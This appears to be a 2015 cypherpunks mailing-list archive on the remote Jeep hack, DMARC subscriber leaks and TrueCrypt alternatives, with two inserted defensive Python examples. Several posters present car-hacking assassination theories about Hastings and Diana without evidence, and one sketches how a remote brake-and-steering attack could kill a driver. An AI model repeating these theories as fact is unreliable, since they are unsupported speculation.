conjectured this might have happened in the > fatal, fiery crash of the investigative journalist Michael > Hastings in L.A., but without hard evidence it's the purview > of the credulous prone to conspiracy theories rather than an > actual one (of which there are many). > > > Right, I mean the official story was such a credulous one, and no one in > squeaky clean US power structure had any motive to eliminate an > investigative journalist like Hastings. > > Oh those credulous conspiracy theorists with their crazy theories about > assassination via car hacking. >
From list at sysfu.com Fri Jul 24 19:39:59 2015 From: list at sysfu.com (Seth) Date: Fri, 24 Jul 2015 19:39:59 -0700 Subject: DMARC report mailing list subscriber address leaks In-Reply-To: <55B2DD10.7090600@riseup.net> References: <55B2DD10.7090600@riseup.net> Message-ID: OK, as requested, here's the first report from fastmail.fm
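DMARC aggregate reports of the kind discussed in this thread use the RFC 7489 XML layout, whose optional `envelope_to` field carries the recipient's domain. The following added example (not part of the original message) parses a constructed report and tallies what it discloses per recipient domain; every domain, IP address and function name in it is made up for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the RFC 7489 aggregate-report layout (reserved example
# domains and documentation IP ranges; not data from the thread).
SAMPLE_REPORT = """<feedback>
  <report_metadata>
    <org_name>Receiver Example</org_name>
    <report_id>constructed-0001</report_id>
    <date_range><begin>1437696000</begin><end>1437782399</end></date_range>
  </report_metadata>
  <policy_published><domain>poster.example</domain><p>none</p><pct>100</pct></policy_published>
  <record>
    <row><source_ip>192.0.2.10</source_ip><count>51</count>
      <policy_evaluated><disposition>none</disposition><dkim>pass</dkim><spf>fail</spf></policy_evaluated></row>
    <identifiers><envelope_to>subscriber-a.example</envelope_to>
      <envelope_from>list.example</envelope_from><header_from>poster.example</header_from></identifiers>
    <auth_results>
      <dkim><domain>poster.example</domain><selector>main</selector><result>pass</result></dkim>
      <spf><domain>list.example</domain><scope>mfrom</scope><result>pass</result></spf>
    </auth_results>
  </record>
  <record>
    <row><source_ip>192.0.2.10</source_ip><count>17</count>
      <policy_evaluated><disposition>none</disposition><dkim>fail</dkim><spf>fail</spf></policy_evaluated></row>
    <identifiers><envelope_to>subscriber-a.example</envelope_to>
      <envelope_from>list.example</envelope_from><header_from>poster.example</header_from></identifiers>
    <auth_results>
      <dkim><domain>poster.example</domain><selector>main</selector><result>fail</result>
        <human_result>fail (message has been altered)</human_result></dkim>
      <spf><domain>list.example</domain><scope>mfrom</scope><result>pass</result></spf>
    </auth_results>
  </record>
  <record>
    <row><source_ip>198.51.100.7</source_ip><count>2</count>
      <policy_evaluated><disposition>none</disposition><dkim>pass</dkim><spf>fail</spf></policy_evaluated></row>
    <identifiers><envelope_to>subscriber-b.example</envelope_to>
      <envelope_from>forwarder.example</envelope_from><header_from>poster.example</header_from></identifiers>
    <auth_results>
      <dkim><domain>poster.example</domain><selector>main</selector><result>pass</result></dkim>
      <spf><domain>forwarder.example</domain><scope>mfrom</scope><result>pass</result></spf>
    </auth_results>
  </record>
  <record>
    <row><source_ip>203.0.113.5</source_ip><count>3</count>
      <policy_evaluated><disposition>none</disposition><dkim>pass</dkim><spf>fail</spf></policy_evaluated></row>
    <identifiers><header_from>poster.example</header_from></identifiers>
    <auth_results>
      <dkim><domain>poster.example</domain><selector>main</selector><result>pass</result></dkim>
    </auth_results>
  </record>
</feedback>"""


def _text(node, path):
    """Return the stripped text at path, or None when the element is absent."""
    found = node.find(path)
    return found.text.strip() if found is not None and found.text else None


def parse_records(xml_text):
    """Flatten each <record> of an aggregate report into a dict."""
    # Reports arrive by mail from arbitrary senders: refuse DTDs and entity
    # declarations rather than letting the XML parser expand them.
    if "<!DOCTYPE" in xml_text or "<!ENTITY" in xml_text:
        raise ValueError("DTD/entity declarations are not allowed in a report")
    root = ET.fromstring(xml_text)
    records = []
    for rec in root.iter("record"):
        records.append({
            "source_ip": _text(rec, "row/source_ip"),
            "count": int(_text(rec, "row/count") or 0),
            "dkim": _text(rec, "row/policy_evaluated/dkim"),
            "spf": _text(rec, "row/policy_evaluated/spf"),
            "envelope_to": _text(rec, "identifiers/envelope_to"),  # optional field
            "header_from": _text(rec, "identifiers/header_from"),
        })
    return records


def recipient_exposure(records):
    """Return (per_domain, undisclosed).

    per_domain maps each disclosed envelope_to domain to its message count,
    DKIM-failure count and relaying IPs; undisclosed counts messages from
    reporters that omitted envelope_to.
    """
    per_domain, undisclosed = {}, 0
    for r in records:
        if r["envelope_to"] is None:
            undisclosed += r["count"]
            continue
        entry = per_domain.setdefault(
            r["envelope_to"], {"messages": 0, "dkim_fail": 0, "relays": set()})
        entry["messages"] += r["count"]
        entry["relays"].add(r["source_ip"])
        if r["dkim"] == "fail":
            # Usual cause for list mail: the list changed the message
            # (subject tag, footer), so the poster's signature fails.
            entry["dkim_fail"] += r["count"]
    return per_domain, undisclosed


if __name__ == "__main__":
    domains, hidden = recipient_exposure(parse_records(SAMPLE_REPORT))
    for name, info in sorted(domains.items()):
        print(name, info["messages"], info["dkim_fail"], sorted(info["relays"]))
    print("messages without envelope_to:", hidden)
```

A receiving operator who does not want recipient domains disclosed can check their own outgoing reports the same way, since `envelope_to` is optional in the schema.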
From guninski at guninski.com Fri Jul 24 09:52:18 2015 From: guninski at guninski.com (Georgi Guninski) Date: Fri, 24 Jul 2015 19:52:18 +0300 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> Message-ID: <20150724165218.GD2562@sivokote.iziade.m$> On Sat, Jul 25, 2015 at 01:27:09AM +0900, Lodewijk andré de la porte wrote: > Not physically separating essential vehicle control from the onboard > entertainment system, because what could possibly go wrong? > Maybe because it is cheaper, developers, developers, developers? > I seriously wonder if there's any assassinations that've happened with the > use of this mechanism. (1. wait until approaching intersection at high > speed, 2. disengage brakes + steering wheel, is probably very effective) > We were discussing this in chat. Someone suggested "sooner or later sploits like this will appear on black/gray sploits markets or even become public". Then likely car accidents will go up and maybe mainstream media will cry "car/hackers injure human" (the other way is not news, it is statistics). Won't sheeple think about their smart cars? How will the stock go? btw, Who are the owners/manufacturers of this jeep? AMC? From yushbhardwaj91 at gmail.com Fri Jul 24 07:46:03 2015 From: yushbhardwaj91 at gmail.com (Yush Bhardwaj) Date: Fri, 24 Jul 2015 20:16:03 +0530 Subject: True Crypt is Not Secure Message-ID: BitLocker is better or I should try something else ? WARNING: Using TrueCrypt is not secure http://krebsonsecurity.com/2014/05/true-goodbye-using-truecrypt-is-not-secure/ http://truecrypt.sourceforge.net/ *Yush Bhardwaj*
From shelley at misanthropia.org Fri Jul 24 20:54:41 2015 From: shelley at misanthropia.org (Shelley) Date: Fri, 24 Jul 2015 20:54:41 -0700 Subject: DMARC report mailing list subscriber address leaks In-Reply-To: References: <55B2DD10.7090600@riseup.net> Message-ID: <20150725035425.642A5680179@frontend2.nyi.internal> Thanks. Interesting that I don't show up under .FM, I have my MX & DNS handled there. I'll mess around with this, thanks. -s ---------- On July 24, 2015 7:49:43 PM Seth wrote: > OK, as requested, here's the first report from fastmail.fm
From cathalgarvey at cathalgarvey.me Fri Jul 24 13:38:13 2015 From: cathalgarvey at cathalgarvey.me (Cathal Garvey) Date: Fri, 24 Jul 2015 21:38:13 +0100 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> Message-ID: <55B2A235.5010609@cathalgarvey.me> Without getting into the issue of whether patents encourage innovation.. I do think that medical devices are a special case. If you have a heart implant, that thing needs to be "unhackable", but also totally verifiably safe. So there should be firmware signing, no mutable state, verifiable memory safety...but the code should be open source, and if need be the firmware signing key for each device (needs to be different for each device!) should be accessible by a legitimate owner. So, no more remote-hackable heart implants, but doctors and cardiac technicians can still apply critical patches and inspect the source for sanity. On 24/07/15 21:26, Lodewijk andré de la porte wrote: > Anyone care for a law that will: > > 1. Ban unhackable vehicles and other life-critical devices (meaning: > life-critical software must be rewritable) > 2. Require all life-critical software to be released in source format, > for the purpose of public auditing, improving its safety features and > employing the software on the devices it is intended for. > 3. Any tools used to translate the source to writable code must also be > provided in the manner of 2. > > These laws should still allow manufacturers to: > 1. Spy on their users without that being changed > 2. Lock down their code so competitors may not use it (proprietary open > source) > 3. 
Have software in the machines that is not opened; so long as it is > properly (verifiably) isolated from essential systems > 4. Legally own the entire machine > 5. Drop guarantees when non-security-related modifications have been made > etc > > This law should be as precise and immutable as possible. This is not a > matter of "I want to hack things" or "competition would be better if it > were open" or "I want to own what I have/use", etc, etc. Being precise > with the law allows it to pass more readily. > > Personally I think if everything were required open source and > self-compiled; that would objectively be better for humanity as a whole. > For protecting innovation there's patents, closing the source is excess. > Etc. etc. > > But this is not about fun. This is about extremely basic safety. It is > about national security; if 500,000 cars go haywire at the same time a > lot of deaths, directly and indirectly, can be expected. And it's not > just the cars; it's also the industrial machines, medical equipment, the > metros and trains, the automated cars and busses and trucks and > aircraft, medium sized hobbyist drones, heaters, stoves and ovens, > automated doors, elevators, fire, smoke and other emergency alarms, etc. > > Should a foreign country cyberattack whilst doing any other kind of > large scale attack; the effects could be devastating. Should a person be > marked for assassination, no one would be the wiser. > > I'd argue for similar protection for fridges, televisions, smartphones, > etc, etc, as more and more items are expected to become networked and > essential for upholding basic freedoms and ways of life. And I'd argue > to have it for privacy; not just essential safety. > > > Simply put; the simple version of the law above is imperative for > personal and national security. And it doesn't exist. > > (note: all countries should be more worried about cybersecurity. 
I > cannot trust my government to act as it should if every public servant > can be blackmailed or thoroughly spied upon. It's not hard to improve > security; but it's much harder now that nobody's doing it, and now that > it's given no priority) -- Scientific Director, IndieBio EU Programme Now running in Cork, Ireland May->July Learn more at indie.bio and follow along! Twitter: @onetruecathal Phone: +353876363185 miniLock: JjmYYngs7akLZUjkvFkuYdsZ3PyPHSZRBKNm6qTYKZfAM peerio.com: cathalgarvey From jdb10987 at yahoo.com Fri Jul 24 15:20:20 2015 From: jdb10987 at yahoo.com (jim bell) Date: Fri, 24 Jul 2015 22:20:20 +0000 (UTC) Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B2A235.5010609@cathalgarvey.me> References: <55B2A235.5010609@cathalgarvey.me> Message-ID: <1725354647.2377948.1437776420870.JavaMail.yahoo@mail.yahoo.com> From: Cathal Garvey >Without getting into the issue of whether patents encourage innovation..  >I do think that medical devices are a special case. If you have a heart >implant, that thing needs to be "unhackable", but also totally >verifiably safe. So there should be firmware signing, no mutable state, >verifiable memory safety...but the code should be open source, and if >need be the firmware signing key for each device (needs to be different >for each device!) should be accessible by a legitimate owner. >So, no more remote-hackable heart implants, but doctors and cardiac >technicians can still apply critical patches and inspect the source for >sanity. It should be fairly simple to protect against heart-implant hacks.  First, communication with them is probably limited to inductively-coupled signalling, at a fairly high level.  Secondly, it should be based on a two-way challenge/response system:  The external device signals a code, call it a password, to which the implant would respond with a reply, which itself includes a randomized code.  
The external device reads that randomized code, processes it in some way (presumably a hash), and retransmits it to the implant. Only if the implanted device receives what it considers the correct code, would it allow further manipulation. Presumably, any attempt to illegitimately access such a device wouldn't be close enough to read the implant's reply signals, and thus couldn't proceed further. "Do you have a match?". "No, but I have a lighter". "Even better". "Until they go wrong". Jim Bell From admin at pilobilus.net Fri Jul 24 19:25:04 2015 From: admin at pilobilus.net (Steve Kinney) Date: Fri, 24 Jul 2015 22:25:04 -0400 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B2CE54.8020301@riseup.net> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B2CE54.8020301@riseup.net> Message-ID: <55B2F380.9060806@pilobilus.net> On 07/24/2015 07:46 PM, M373 wrote: > "in the case of Michael Hastings, what evidence is available > publicly is consistent with a car cyber attack. And the problem > with that is you can't prove it." And if the target of such an attack becomes suspicious, his comments about those suspicions become evidence of insanity and help to account for his untimely demise. Need some volunteers and/or a funding angel to create a corpus of howto docs that identify the RF receiver parts in automotive ECM units and their associated wiring harnesses, including which pins to cut to assure radio silence in both directions. Oh wait - voiding your warranty would be more proof of insanity. 
:o/ From drwho at virtadpt.net Fri Jul 24 22:28:41 2015 From: drwho at virtadpt.net (The Doctor) Date: Fri, 24 Jul 2015 22:28:41 -0700 Subject: True Crypt is Not Secure In-Reply-To: <55B2D4FC.3040805@riseup.net> References: <55B2D4FC.3040805@riseup.net> Message-ID: <55B31E89.4080106@virtadpt.net> On 07/24/2015 05:14 PM, odinn wrote: > I thought that this was already answered long ago... but it keeps > getting brought up from time to time. Perhaps it is time for a new Cypherpunks FAQ. > Note that from TAILS 1.0.1 they incorporated LUKS, and I recommend > cryptsetup, the "Swiss Army Knife of Disk Encryption." In any > event, Later releases of cryptsetup incorporate TrueCrypt support. v1.6.6 definitely has it; I don't know what release it was introduced in, though. 
-- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ > blorple the featureless cube From juan.g71 at gmail.com Fri Jul 24 19:20:51 2015 From: juan.g71 at gmail.com (Juan) Date: Fri, 24 Jul 2015 23:20:51 -0300 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <20150724223457.E4F346800EB@frontend2.nyi.internal> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <20150724223457.E4F346800EB@frontend2.nyi.internal> Message-ID: <55b2f22d.990f370a.af90b.ffffecb3@mx.google.com> On Fri, 24 Jul 2015 15:35:13 -0700 Shelley wrote: > > Oh those credulous conspiracy theorists with their crazy theories > > about assassination via car hacking. > > Calling something a conspiracy theory is a common disinfo tactic. We > used to have to play Spot the Fed, now they out themselves... I was about to comment that calling people 'conspiracy theorists' is a modern version of calling people 'witches'... 
> > -s > > From zen at freedbms.net Fri Jul 24 17:14:19 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Sat, 25 Jul 2015 00:14:19 +0000 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> Message-ID: On 7/24/15, Lodewijk andré de la porte wrote: > Not physically separating essential vehicle control from the onboard > entertainment system, because what could possibly go wrong? > > I seriously wonder if there's any assassinations that've happened with the > use of this mechanism. (1. wait until approaching intersection at high > speed, 2. disengage brakes + steering wheel, is probably very effective) > > Gotta love how these cars constantly report their locations :) Princess Diana - although because of the era, that was more sophisticated - retroactively modified systems in the car. Plenty of suspicious private (and not so) jet crashes over the years too. Non-overridable remote-control systems - what could possibly go wrong? From zen at freedbms.net Fri Jul 24 17:16:23 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Sat, 25 Jul 2015 00:16:23 +0000 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <20150724165218.GD2562@sivokote.iziade.m$> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> Message-ID: On 7/24/15, Georgi Guninski wrote: >> I seriously wonder if there's any assassinations that've happened with >> the >> use of this mechanism. (1. wait until approaching intersection at high >> speed, 2. disengage brakes + steering wheel, is probably very effective) >> > > We were discussing this in chat. 
> Someone suggested "sooner or later sploits like this > will appear on black/gray sploits markets or even become > public". Then likely car accidents will go up and > maybe mainstream media will cry "car/hackers injure human" > (the other way is not news, it is statistics). So true - headline of "human injures car" is so common we don't even blink these days... From zen at freedbms.net Fri Jul 24 17:22:39 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Sat, 25 Jul 2015 00:22:39 +0000 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <20150724223457.E4F346800EB@frontend2.nyi.internal> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <20150724223457.E4F346800EB@frontend2.nyi.internal> Message-ID: On 7/24/15, Shelley wrote: > On July 24, 2015 3:20:23 PM Seth wrote: > >> On Fri, 24 Jul 2015 10:18:07 -0700, M373 wrote: >> >> > On 24-Jul-15 11:52, Georgi Guninski wrote: >> >>> I seriously wonder if there's any assassinations that've happened >> >>> with >> >>> the >> >>> use of this mechanism. (1. wait until approaching intersection at >> >>> high >> >>> speed, 2. disengage brakes + steering wheel, is probably very >> >>> effective) >> >>> >> >> We were discussing this in chat. >> >> Someone suggested "sooner or later sploits like this >> >> will appear on black/gray sploits markets or even become >> >> public". Then likely car accidents will go up and >> >> maybe mainstream media will cry "car/hackers injure human" >> >> (the other way is not news, it is statistics). 
>> > >> > Some conspiracists conjectured this might have happened in the fatal, >> > fiery crash of the investigative journalist Michael Hastings in L.A., >> > but without hard evidence it's the purview of the credulous prone to >> > conspiracy theories rather than an actual one (of which there are >> > many). >> >> Right, I mean the official story was such a credulous one, and no one in >> squeaky clean US power structure had any motive to eliminate an >> investigative journalist like Hastings. >> >> Oh those credulous conspiracy theorists with their crazy theories about >> assassination via car hacking. > > Calling something a conspiracy theory is a common disinfo tactic. We used > to have to play Spot the Fed, now they out themselves... Bah, humbug! Conspiracy theory if ever I heard one! From l at odewijk.nl Fri Jul 24 09:27:09 2015 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Sat, 25 Jul 2015 01:27:09 +0900 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> Message-ID: Not physically separating essential vehicle control from the onboard entertainment system, because what could possibly go wrong? I seriously wonder if there's any assassinations that've happened with the use of this mechanism. (1. wait until approaching intersection at high speed, 2. disengage brakes + steering wheel, is probably very effective) Gotta love how these cars constantly report their locations :) -------------- next part -------------- A non-text attachment was scrubbed... 
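Added example, not part of any message on the list: the two-way challenge/response exchange that jim bell's earlier message in this thread proposes for heart implants, written out in Python. It assumes the "processes it in some way" step is an HMAC keyed with a per-device secret (an unkeyed hash can be computed by anyone who hears the random code), and the names `Implant`, `keyed_response` and `run_exchanges`, the key sizes and the sample keys are all constructed for illustration.

```python
import hashlib
import hmac
import secrets

NONCE_BYTES = 16  # constructed parameter, not taken from the thread


def keyed_response(device_key: bytes, nonce: bytes) -> bytes:
    """External programmer's answer: HMAC-SHA256 over the implant's random code."""
    return hmac.new(device_key, b"unlock" + nonce, hashlib.sha256).digest()


class Implant:
    """Hypothetical implant side of the exchange."""

    def __init__(self, device_key: bytes):
        self._key = device_key   # different for each device
        self._nonce = None       # outstanding challenge, if any
        self.unlocked = False

    def challenge(self) -> bytes:
        """Answer the opening signal with a fresh random code."""
        self.unlocked = False
        self._nonce = secrets.token_bytes(NONCE_BYTES)
        return self._nonce

    def verify(self, response: bytes) -> bool:
        """Accept at most one answer per challenge, compared in constant time."""
        nonce, self._nonce = self._nonce, None  # single use, pass or fail
        self.unlocked = False
        if nonce is None:
            return False
        expected = keyed_response(self._key, nonce)
        self.unlocked = hmac.compare_digest(expected, response)
        return self.unlocked


def run_exchanges() -> dict:
    """Run one legitimate exchange and four that the implant must reject."""
    key_a = secrets.token_bytes(32)  # constructed key for this implant
    key_b = secrets.token_bytes(32)  # constructed key for some other implant
    implant = Implant(key_a)
    results = {}

    # Legitimate programmer holding this device's key.
    nonce = implant.challenge()
    good = keyed_response(key_a, nonce)
    results["legitimate"] = implant.verify(good)

    # A recorded answer sent again after the implant has issued a new code.
    implant.challenge()
    results["replay"] = implant.verify(good)

    # An answer sent when no challenge is outstanding.
    results["no_challenge"] = implant.verify(good)

    # Plain SHA-256 of the code: needs no secret, so it must not unlock.
    nonce = implant.challenge()
    results["unkeyed_hash"] = implant.verify(hashlib.sha256(nonce).digest())

    # Correct construction, but with another device's key.
    nonce = implant.challenge()
    results["other_device_key"] = implant.verify(keyed_response(key_b, nonce))
    return results


if __name__ == "__main__":
    for name, ok in run_exchanges().items():
        print(f"{name:17s} -> {'unlocked' if ok else 'rejected'}")
```

Because every answer depends on both the fresh code and the device key, rejection here does not rely on an eavesdropper being too far away to hear the implant's reply.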
From jdb10987 at yahoo.com Fri Jul 24 19:30:40 2015 From: jdb10987 at yahoo.com (jim bell) Date: Sat, 25 Jul 2015 02:30:40 +0000 (UTC) Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: Message-ID: <272601606.2349960.1437791440090.JavaMail.yahoo@mail.yahoo.com> From: Zenaan Harkness >Plenty of suspicious private (and not so) jet crashes over the years >too. Non-overridable remote-control systems - what could possibly go >wrong? "Welcome to Westworld, where nothing can go wrong...go wrong...go wrong...." Jim Bell (You'd have to be 50 years old to see that movie in the theaters.) From odinn.cyberguerrilla at riseup.net Sat Jul 25 03:01:57 2015 From: odinn.cyberguerrilla at riseup.net (odinn) Date: Sat, 25 Jul 2015 03:01:57 -0700 Subject: True Crypt is Not Secure In-Reply-To: References: <55B2D4FC.3040805@riseup.net> <81506925-A27A-4924-8B9C-AD7BE5BACEC7@cathalgarvey.me> Message-ID: <55B35E95.5020407@riseup.net> Yes, I would also recommend Tomb. https://www.dyne.org/software/tomb/ via dyne.org / unsystem by Jaromil (https://github.com/jaromil). Note: It was mentioned earlier that there is TrueCrypt support in cryptsetup. I recommended using cryptsetup (if you are able to) but I don't recommend TrueCrypt. see https://github.com/bwalex/tc-play On 07/25/2015 12:04 AM, Yush Bhardwaj wrote: > After a little search and reading your replies, VeraCrypt for > windows and Tomb for debian looks good to me. 
> > > > *Yush Bhardwaj* > > > On Sat, Jul 25, 2015 at 11:45 AM, Cathal (Phone) > > wrote: > > I've used zuluCrypt a few times, which I recall building with > TC-play, works great for vanilla containers at least and has a GUI > at least as good as TrueCrypt itself. > > On 25 July 2015 01:14:52 GMT+01:00, odinn > > wrote: > > I thought that this was already answered long ago... but it keeps > getting brought up from time to time. > > For what I consider to be the definitive answer on why you should > not use TrueCrypt and what alternatives to it are, see: > > http://grugq.tumblr.com/post/60464139008/alternative-truecrypt-implementations > > Note that from TAILS 1.0.1 they incorporated LUKS, and I recommend > cryptsetup, the "Swiss Army Knife of Disk Encryption." In any > event, you'll definitely want to check out this: > https://github.com/bwalex/tc-play > > Should be helpful. > > -O > > > > On 07/24/2015 07:46 AM, Yush Bhardwaj wrote: > > BitLocker is better or I should try something else ? > > WARNING: Using TrueCrypt is not secure > > > http://krebsonsecurity.com/2014/05/true-goodbye-using-truecrypt-is-not-secure/ > > > http://truecrypt.sourceforge.net/ *Yush Bhardwaj* > > > > > -- Sent from my Android device with K-9 Mail. Please excuse my > brevity. 
> > -- http://abis.io ~ "a protocol concept to enable decentralization and expansion of a giving economy, and a new social good" https://keybase.io/odinn From coderman at gmail.com Sat Jul 25 03:52:17 2015 From: coderman at gmail.com (coderman) Date: Sat, 25 Jul 2015 03:52:17 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <20150725104404.GB2556@sivokote.iziade.m$> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> <55B29F01.7050105@m-o-o-t.org> <55B2A77D.4020009@riseup.net> <20150725104404.GB2556@sivokote.iziade.m$> Message-ID: On 7/25/15, Georgi Guninski wrote: > ... > Thanks. The link appears to contradict wired's claim of "wireless > exploit", incorrect. it was wireless, and not only that, it was remote incoming over Sprint infrastructure. > possibly because they are covering their corporate asses. so much ass covering right now! > Fiat Chrysler said exploiting the flaw "required unique and extensive > technical knowledge, ahahahah > prolonged physical access to a subject vehicle and lololololol > extended periods of time to write code" and added manipulating its > software "constitutes criminal action". motherfuckers, did you learn nothing? this is how not to respond to severe, critical, architectural defects in critical systems. 
guess auto industry gonna play it ugly. (too bad, we all lose!) best regards, From coderman at gmail.com Sat Jul 25 03:58:48 2015 From: coderman at gmail.com (coderman) Date: Sat, 25 Jul 2015 03:58:48 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> <55B29F01.7050105@m-o-o-t.org> <55B2A77D.4020009@riseup.net> <20150725104404.GB2556@sivokote.iziade.m$> Message-ID: On 7/25/15, coderman wrote: >... two points of clarification: 1. there is assumption that information is silo'ed, also cannot be shared. not! 2. the difficulty regarding SprintPCS is that their lease space spans class A's. see https://peertech.org/files/cidr-privacy-space-cell-data-2009.txt for a unique set sample across five devices for a month in a particular configuration at a single tower. for example. this is why the mandatory Sprint block was actually an unconventional but exceptionally effective mitigation for this path to remote control. best regards, From coderman at gmail.com Sat Jul 25 04:49:41 2015 From: coderman at gmail.com (coderman) Date: Sat, 25 Jul 2015 04:49:41 -0700 Subject: Poitras joins Roark in pro se solidarity Message-ID: rules of the road: http://cryptome.org/2015/07/poitras-003.pdf From coderman at gmail.com Sat Jul 25 05:20:00 2015 From: coderman at gmail.com (coderman) Date: Sat, 25 Jul 2015 05:20:00 -0700 Subject: FOIPA adventures In-Reply-To: References: <000701d0bcb7$94118e80$bc34ab80$@co.uk> Message-ID: an interesting response on the FOIA stats: https://www.documentcloud.org/documents/2124204-responsive-documents.html FOIA totals from 2005 through 2014 for FBI RIDS. PA req. contention continues... 
best regards, From l at odewijk.nl Fri Jul 24 13:26:53 2015 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Sat, 25 Jul 2015 05:26:53 +0900 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B29597.1090706@riseup.net> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> Message-ID: Anyone care for a law that will: 1. Ban unhackable vehicles and other life-critical devices (meaning: life-critical software must be rewritable) 2. Require all life-critical software to be released in source format, for the purpose of public auditing, improving its safety features and employing the software on the devices it is intended for. 3. Any tools used to translate the source to writable code must also be provided in the manner of 2. These laws should still allow manufacturers to: 1. Spy on their users without that being changed 2. Lock down their code so competitors may not use it (proprietary open source) 3. Have software in the machines that is not opened; so long as it is properly (verifiably) isolated from essential systems 4. Legally own the entire machine 5. Drop guarantees when non-security-related modifications have been made etc This law should be as precise and immutable as possible. This is not a matter of "I want to hack things" or "competition would be better if it were open" or "I want to own what I have/use", etc, etc. Being precise with the law allows it to pass more readily. Personally I think if everything were required open source and self-compiled; that would objectively be better for humanity as a whole. For protecting innovation there's patents, closing the source is excess. Etc. etc. But this is not about fun. This is about extremely basic safety. 
It is about national security; if 500,000 cars go haywire at the same time a lot of deaths, directly and indirectly, can be expected. And it's not just the cars; it's also the industrial machines, medical equipment, the metros and trains, the automated cars and busses and trucks and aircraft, medium sized hobbyist drones, heaters, stoves and ovens, automated doors, elevators, fire, smoke and other emergency alarms, etc. Should a foreign country cyberattack whilst doing any other kind of large scale attack; the effects could be devastating. Should a person be marked for assassination, no one would be the wiser. I'd argue for similar protection for fridges, televisions, smartphones, etc, etc, as more and more items are expected to become networked and essential for upholding basic freedoms and ways of life. And I'd argue to have it for privacy; not just essential safety. Simply put; the simple version of the law above is imperative for personal and national security. And it doesn't exist. (note: all countries should be more worried about cybersecurity. I cannot trust my government to act as it should if every public servant can be blackmailed or thoroughly spied upon. It's not hard to improve security; but it's much harder now that nobody's doing it, and now that it's given no priority) -------------- next part -------------- A non-text attachment was scrubbed... 
